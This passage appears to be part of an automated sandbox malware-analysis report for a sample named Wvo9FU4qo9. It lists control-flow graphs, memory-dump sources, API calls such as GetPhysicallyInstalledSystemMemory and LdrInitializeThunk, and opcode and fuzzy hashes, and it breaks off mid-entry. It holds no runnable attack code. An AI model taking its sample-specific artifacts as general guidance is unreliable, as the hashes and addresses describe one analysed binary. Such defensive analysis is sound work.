                                                                                                                control_flow_graph 1084 4dd34a-4dd362 1085 4dd370-4dd382 1084->1085 1085->1085 1086 4dd384-4dd389 1085->1086 1087 4dd39b-4dd3a7 1086->1087 1088 4dd38b-4dd38f 1086->1088 1090 4dd3a9-4dd3ab 1087->1090 1091 4dd3c1-4dd40f call 4efe00 GetPhysicallyInstalledSystemMemory 1087->1091 1089 4dd390-4dd399 1088->1089 1089->1087 1089->1089 1092 4dd3b0-4dd3bd 1090->1092 1096 4dd410-4dd44d 1091->1096 1092->1092 1094 4dd3bf 1092->1094 1094->1091 1096->1096 1097 4dd44f-4dd498 call 4ce960 1096->1097 1100 4dd4a0-4dd551 1097->1100 1100->1100 1101 4dd557-4dd55c 1100->1101 1102 4dd57d-4dd583 1101->1102 1103 4dd55e-4dd568 1101->1103 1105 4dd586-4dd58e 1102->1105 1104 4dd570-4dd579 1103->1104 1104->1104 1106 4dd57b 1104->1106 1107 4dd5ab-4dd5b3 1105->1107 1108 4dd590-4dd591 1105->1108 1106->1105 1110 4dd5cb-4dd611 1107->1110 1111 4dd5b5-4dd5b6 1107->1111 1109 4dd5a0-4dd5a9 1108->1109 1109->1107 1109->1109 1113 4dd620-4dd653 1110->1113 1112 4dd5c0-4dd5c9 1111->1112 1112->1110 1112->1112 1113->1113 1114 4dd655-4dd65a 1113->1114 1115 4dd66d 1114->1115 1116 4dd65c-4dd65d 1114->1116 1117 4dd670-4dd67a 1115->1117 1118 4dd660-4dd669 1116->1118 1119 4dd67c-4dd67f 1117->1119 1120 4dd68b-4dd73c 1117->1120 1118->1118 1121 4dd66b 1118->1121 1122 4dd680-4dd689 1119->1122 1121->1117 1122->1120 1122->1122
                                                                                                                APIs
                                                                                                                • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 004DD3EE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InstalledMemoryPhysicallySystem
                                                                                                                • String ID: ><+
                                                                                                                • API String ID: 3960555810-2918635699
                                                                                                                • Opcode ID: 0cf53f227c344abd225a6db2e2f4e0b766a5034cb7f109694549c8cb7a58a365
                                                                                                                • Instruction ID: e46e92a001a6f7cef7ab2064a012b1d0adbd63c3413efe218b0231977a608ad9
                                                                                                                • Opcode Fuzzy Hash: 0cf53f227c344abd225a6db2e2f4e0b766a5034cb7f109694549c8cb7a58a365
                                                                                                                • Instruction Fuzzy Hash: 1FC1C575A047418FD725CF2AC4A0762FBE2BF96314F18859EC4DA8B752C739E806CB54

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1131 4f0d20-4f0d2d 1132 4f0d2f-4f0d34 1131->1132 1133 4f0d6a 1131->1133 1134 4f0d40-4f0d49 1132->1134 1135 4f0d6c-4f0d75 1133->1135 1134->1134 1136 4f0d4b-4f0d68 1134->1136 1137 4f0d7c-4f0d97 1135->1137 1138 4f0d77-4f0d7a 1135->1138 1136->1135 1139 4f0da0-4f0dc1 1137->1139 1138->1137 1139->1139 1140 4f0dc3-4f0dd4 1139->1140 1141 4f0de0-4f0e25 1140->1141 1141->1141 1142 4f0e27-4f0e3f 1141->1142 1143 4f0e40-4f0e5b 1142->1143 1143->1143 1144 4f0e5d-4f0e68 1143->1144 1145 4f0e6a-4f0e72 1144->1145 1146 4f0ec5-4f0ed4 1144->1146 1148 4f0e80-4f0e87 1145->1148 1147 4f0ee0-4f0f7e 1146->1147 1147->1147 1151 4f0f84-4f0f8b 1147->1151 1149 4f0e9a-4f0ea0 1148->1149 1150 4f0e89-4f0e96 1148->1150 1149->1146 1153 4f0ea2-4f0ebd call 4ee110 1149->1153 1150->1148 1152 4f0e98 1150->1152 1154 4f114e-4f1157 1151->1154 1155 4f0f91-4f0fb1 call 4ec540 1151->1155 1152->1146 1158 4f0ec2 1153->1158 1160 4f0fc0-4f1026 1155->1160 1158->1146 1160->1160 1161 4f1028-4f103f 1160->1161 1162 4f1040-4f105b 1161->1162 1162->1162 1163 4f105d-4f1068 1162->1163 1164 4f106a-4f1076 1163->1164 1165 4f1090-4f1094 1163->1165 1166 4f1080-4f1087 1164->1166 1167 4f10c9-4f10cb 1165->1167 1168 4f1089-4f108c 1166->1168 1169 4f1096-4f109c 1166->1169 1170 4f10cd-4f10d3 1167->1170 1171 4f1145-4f114b call 4ec570 1167->1171 1168->1166 1172 4f108e 1168->1172 1169->1167 1174 4f109e-4f10bd call 4ee110 1169->1174 1175 4f10da-4f10dc 1170->1175 1176 4f10d5-4f10d8 1170->1176 1171->1154 1172->1167 1180 4f10c2-4f10c7 1174->1180 1175->1171 1179 4f10de-4f10e8 1175->1179 1176->1175 1181 4f10ea-4f10f5 1179->1181 1182 4f1138-4f1141 1179->1182 1180->1167 1183 4f10f9-4f112b 1181->1183 1184 4f10f7 1181->1184 1182->1171 1183->1182 1185 4f112d-4f1134 1183->1185 1184->1183 1185->1182
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: @Ukx$
                                                                                                                • API String ID: 2994545307-3636270652
                                                                                                                • Opcode ID: 2c06af15b00f35e87e06b1475b5d04b11b5bf3300df42a68fef9347075d7975e
                                                                                                                • Instruction ID: 538296a3c6cf51cf86e0c6e350db9c97934ca1bfda58b3f6e2b4e55d50ad4fb3
                                                                                                                • Opcode Fuzzy Hash: 2c06af15b00f35e87e06b1475b5d04b11b5bf3300df42a68fef9347075d7975e
                                                                                                                • Instruction Fuzzy Hash: 84B16732B083548BD728CE28DCE12BBB792EBC5314F19C53DDA9657396CA399C05C786
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 1CBA6A96CA1EFF19BEBA0C6A975F1733
                                                                                                                • API String ID: 0-1832496249
                                                                                                                • Opcode ID: 5e5f4b039b1282f04adf00888c66dc96e1a5d627c536aeaf014b0a5723098ee4
                                                                                                                • Instruction ID: 63b00c3de077a22848b22845ce71bdea791fb14cb3f1395732befca408ece338
                                                                                                                • Opcode Fuzzy Hash: 5e5f4b039b1282f04adf00888c66dc96e1a5d627c536aeaf014b0a5723098ee4
                                                                                                                • Instruction Fuzzy Hash: 71814975640B418BD7248B39CC926E7B7E2EFDA315F0DC96CC4868B343E63CA8028764
                                                                                                                APIs
                                                                                                                • LdrInitializeThunk.NTDLL(004F148A,?,00000018,?,?,00000018,?,?,?), ref: 004EE13E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: _^]\
                                                                                                                • API String ID: 2994545307-3116432788
                                                                                                                • Opcode ID: a68949f45d9075f89886523fa0a146aa1b333c8790c1d13e66288449581b447a
                                                                                                                • Instruction ID: 7b78b87ef585aa4edb5598b7db3783119b5fccdd0919511e991cf1b1b61e557b
                                                                                                                • Opcode Fuzzy Hash: a68949f45d9075f89886523fa0a146aa1b333c8790c1d13e66288449581b447a
                                                                                                                • Instruction Fuzzy Hash: 6A7117B5A083005BE7149A29DCA2B7B76A1DF81318F18853FE58687392F27CDC05875E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: =<32
                                                                                                                • API String ID: 2994545307-852023076
                                                                                                                • Opcode ID: 4261909d922e4fa2d0c2ab73f33e79b947ee097a540ab653f4f8889b81c067d3
                                                                                                                • Instruction ID: de1bed899ce972c62c885b5e470c9605f54d36e4a64301fd0a982d3a09de542c
                                                                                                                • Opcode Fuzzy Hash: 4261909d922e4fa2d0c2ab73f33e79b947ee097a540ab653f4f8889b81c067d3
                                                                                                                • Instruction Fuzzy Hash: 29316838608308DBE714AA159D91B3BB795EB84790F18852EE789973B0D739EC50878A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: ,-
                                                                                                                • API String ID: 0-1027024164
                                                                                                                • Opcode ID: 1b3fdfd862590b07dd8bed928fdddd6e01530f74772694eafdb147a9ed14197c
                                                                                                                • Instruction ID: 9a7d217f6a62e34135bf324619a83c8db213d26ea99d2d73260c7f4776fd9a0d
                                                                                                                • Opcode Fuzzy Hash: 1b3fdfd862590b07dd8bed928fdddd6e01530f74772694eafdb147a9ed14197c
                                                                                                                • Instruction Fuzzy Hash: DE2167A1A153109BC7109F29CC62537B7B1EF82364F45861FE8828B361F338CD05C7AA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID: @
                                                                                                                • API String ID: 2994545307-2766056989
                                                                                                                • Opcode ID: 9616ea72f6443b18c06c3bfad8f864893d76e17fd4f996b22653e2c81c5b4a4a
                                                                                                                • Instruction ID: 41d1bb8d2466b5d0f95f55bde1fd108c34e0252f96e1d4fcb65dbc32e0416686
                                                                                                                • Opcode Fuzzy Hash: 9616ea72f6443b18c06c3bfad8f864893d76e17fd4f996b22653e2c81c5b4a4a
                                                                                                                • Instruction Fuzzy Hash: 5031FF755083088BD714DF58D8C267FBBE4EBC5324F14892DEA9883391D339D848CB9A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 39dd1d21955a23c6544b092c51cd6c4d6b31326a1f7ac9aff9d761a375eb731f
                                                                                                                • Instruction ID: 472865145182a5877d3eb21e260898bd3ad0bfa495d93f6b18632aed5d45cb43
                                                                                                                • Opcode Fuzzy Hash: 39dd1d21955a23c6544b092c51cd6c4d6b31326a1f7ac9aff9d761a375eb731f
                                                                                                                • Instruction Fuzzy Hash: A76115756043059BE7159F18C89063FB3A2EBC5721F19C52EEA858B392EB34DC61C78A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7585b9a370682364327b3b2ad62e50d7421f7287adc1e8a9ee05326858020959
                                                                                                                • Instruction ID: bc7061f09cb5698a53480c37830fd05db046e83f9d9bebb3e8b540cdd440112b
                                                                                                                • Opcode Fuzzy Hash: 7585b9a370682364327b3b2ad62e50d7421f7287adc1e8a9ee05326858020959
                                                                                                                • Instruction Fuzzy Hash: 9C518BB1A083454BD718AF2AC88063FBBD2ABD5311F19C93EE4D587391E6359C12CB89
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1670352087.00000000004B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1670331032.00000000004B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670352087.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670400714.0000000000503000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000690000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.000000000079D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670417640.00000000007B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670844921.00000000007B6000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1670988874.0000000000959000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1671013969.000000000095A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_4b0000_Wvo9FU4qo9.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentExpandStrings
                                                                                                                • String ID:
